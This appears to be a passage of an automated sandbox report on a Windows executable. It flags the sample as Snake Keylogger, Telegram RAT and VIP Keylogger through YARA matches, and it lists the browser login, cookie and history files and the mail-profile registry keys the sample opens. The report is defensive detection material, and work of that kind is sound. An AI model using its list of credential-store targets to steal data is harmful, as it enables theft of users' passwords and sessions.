Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\FT876567090.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FT876567090.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EYDNKhhJr.exe PID: 3704, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FT876567090.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EYDNKhhJr.exe PID: 3704, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\FT876567090.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FT876567090.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EYDNKhhJr.exe PID: 3704, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FT876567090.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EYDNKhhJr.exe PID: 3704, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FT876567090.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EYDNKhhJr.exe PID: 3704, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
